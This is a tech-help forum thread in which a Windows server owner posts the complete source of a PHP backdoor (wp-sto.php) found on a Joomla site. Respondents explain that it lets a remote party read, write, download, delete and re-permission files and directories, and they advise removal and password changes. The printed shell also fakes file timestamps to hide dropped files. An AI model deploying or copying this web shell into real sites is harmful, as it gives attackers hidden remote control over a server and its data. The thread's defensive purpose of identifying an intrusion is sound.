strange file suddenly appeared

Hi,

I have a Windows 2008 server running PHP among other things. I have a Joomla site that I noticed today has a strange file added at my site root 4 days ago that I'm not sure what it is.

Obviously I'm alarmed, but I took a look at the file and I'm enough of a newb with PHP, I'm not entirely sure what it's all supposed to be doing or what it's origins might be. Can anyone have a gander and summarize what this is? It's a file called wp-sto.php but wordpress is not present on this site.

<?
ignore_user_abort(1);

$err_flg=$_GET['err'];
if ($err_flg==1) {error_reporting(-1);}
else {error_reporting(0);}

set_time_limit(300);

  if (isset($_GET['sc']) && ($_GET['sc'] == 1)) die(file_get_contents(__FILE__));
  if (isset($_GET['scmd5']) && ($_GET['scmd5'] == 1)) die(md5(file_get_contents(__FILE__)));
  if (isset($_GET['read']) && isset($_GET['write'])) {file_put_contents($_GET["write"],file_get_contents($_GET['read'])); die();}
  if (isset($_GET['read']) && !isset($_GET['write'])) die(file_get_contents($_GET['read']));
  if (isset($_GET['del'])) { unlink($_GET['del']); die();}

$else_dot=$_GET['else_dot'];
$flag_sum=$_GET['flag_sum'];
$chmod_name=$_GET['chmod_name'];
$chmod_mod=$_GET['chmod_mod'];
$chmod_mod=intval($chmod_mod, 8);
$f_creat_url=$_GET['f_creat_url'];
$f_creat_name=$_GET['f_creat_name'];
$f_del_name=$_GET['f_del_name'];
$folder_creat_name=$_GET['folder_creat_name'];
$folder_del_name=$_GET['folder_del_name'];
$tfilet=$_GET['tfilet'];

if ($flag_sum==1) {echo "734057843957";}

if ($tfilet)
	{
	atouch($tfilet);	
	}

if ($chmod_name)
   {
   if ($else_dot==1) {chmod ($chmod_name, $chmod_mod);}
   else
       {
       if ($else_dot) {chmod ("$chmod_name.$else_dot", $chmod_mod);}
       else {chmod ("$chmod_name.php", $chmod_mod);}
       }
   echo "ok chmod";
   }


if ($f_creat_url)
   {
   $new_vsn1="http://$f_creat_url";
   $new_vsn=getau("$new_vsn1");
   if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}
   else
       {
       if ($else_dot) {$new_v_f=fopen("$f_creat_name.$else_dot","w+");}
       else {$new_v_f=fopen("$f_creat_name.php","w+");}
       }
   fwrite($new_v_f, "$new_vsn");
   fclose($new_v_f);
   echo "ok creat file";
   }

if ($f_del_name)
   {
   if ($else_dot==1) {unlink ("$f_del_name");}
   else
       {
       if ($else_dot) {unlink ("$f_del_name.$else_dot");}
       else {unlink ("$f_del_name.php");}
       }
   echo "ok del file";
   }

if ($folder_creat_name)
   {
   $flag_mkd = mkdir ($folder_creat_name, 0777);
   echo "ok make dir";
   }

if ($folder_del_name)
   {
   $folder_del_name=trim($folder_del_name);
   if ($folder_del_name<>"")
   {
   removeDirRec("$folder_del_name");
   echo "ok del dir";
   }
   }

function getau ($path)
{
 if (!function_exists ("file_get_contents"))
 {
  function file_get_contents ($addr)
  {
   $a = @fopen ($addr, "r");
   $tmp = @fread ($a, sprintf ("%u", @filesize ($a)));
   @fclose ($a);
   if ($a) return @$tmp;
  }
 }

 if (!function_exists ("file_put_contents"))
 {
  function file_put_contents ($addr, $con)
  {
   $a = @fopen ($addr, "w+");
   if (!$a) return 0;
   @fwrite ($a, $con);
   @fclose ($a);
   return @strlen ($con);
  }
 }
 $content = file_get_contents ($path);
 if ($content=="")
 {
  $curl = curl_init ();
  curl_setopt ($curl, CURLOPT_URL, trim($path));
  curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
  curl_setopt ($curl, CURLOPT_TIMEOUT, 5);
  $content = curl_exec ($curl);
  curl_close($curl);
 }
 if ($content!="")
 {
  return $content;
 }
}

function atouch($dist)
		{
		$dist = "$dist.php";
		$filetimefilec = "index.php";
		$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
		$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
		if ( (!$cftime2=strchr($MTime,"200")) and (!$cftime3=strchr($MTime,"201")) )
			{
			$filetimefilec = "index.html";
			$ATime  = date('Y-m-d H:i:s',fileatime($filetimefilec));
			$MTime = date('Y-m-d H:i:s',filemtime($filetimefilec));
			}
		if ( ($cftime2=strchr($ATime,"200")) or ($cftime3=strchr($ATime,"201")) )
			{
			$MTime = filemtime("$filetimefilec");
			@touch($dist,$MTime,$MTime);
			}
		}
function removeDirRec($dir)
{
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            is_dir($obj) ? removeDirRec($obj) : unlink($obj);
        }
    }
    rmdir($dir);
}



?>

Open in new window


Any ideas?

Thanks
LVL 1
billium99Asked:
Who is Participating?

[Webinar] Streamline your web hosting managementRegister Today

x
 
Ray PaseurConnect With a Mentor Commented:
And look out for security exploits, especially in the plug-ins.
http://developer.joomla.org/security.html
0
 
Marco GasiFreelancerCommented:
I only toke a look, but if I were you I would immediately backup those file in my localhost for deeper analysis and then I would delete them from the server. Immediately.

Then I would talk with the hosting service provider. The code you posted above changes permissions, deletes files and these are thing only should do: if you're not sure about, don't trust it.

I don't know joomla, but I doubt any framwork can create such files: I repeat, copy them in an unoffensive location and delete them from the server, then talk with host provider.
0
 
billium99Author Commented:
Hmm - this is my dedicated server. File already moved offline.

Changes permissions in what way? Deletes which files?
0
Receive 1:1 tech help

Solve your biggest tech problems alongside global tech experts with 1:1 help.

 
Dave BaldwinFixer of ProblemsCommented:
Yes, get rid of that file.
0
 
Marco GasiFreelancerCommented:
'Changes permissions in what way?': look at line 37. chmod changes permissions of files and directories.

'Deletes which files?': look at line 67. Unlink is the php command to delete files.
0
 
Dave BaldwinConnect With a Mentor Fixer of ProblemsCommented:
And all that is done from data sent in the URL to that page.  That's where all the $_GET variables come from.  It is a way of remotely changing your web site without your permission.  Even deleting the whole thing.
0
 
Dave BaldwinFixer of ProblemsCommented:
And yes, someone broke into your server.  You should change passwords for all access.
0
 
Marco GasiConnect With a Mentor FreelancerCommented:
Yes, indeed. I was reading the code: really, I don't understand what exactly does in which sequence, but it seems to be a trojan horse: from a remote web server one bad guy intends to call that file passing it some parameter and do something bad like delete your files, even empty whole directories...

Change all password and provide security to your dedicated server, because it has been violated. I'm sorry.
0
 
gr8gonzoConnect With a Mentor ConsultantCommented:
Make sure Joomla is also updated to its latest release for your major version. It's possible that a hacker doesn't know any passwords or hasn't actually hacked into your server yet but simply used a Joomla exploit to place a file to gain further access.
0
 
billium99Author Commented:
Thanks
0
All Courses

From novice to tech pro — start learning today.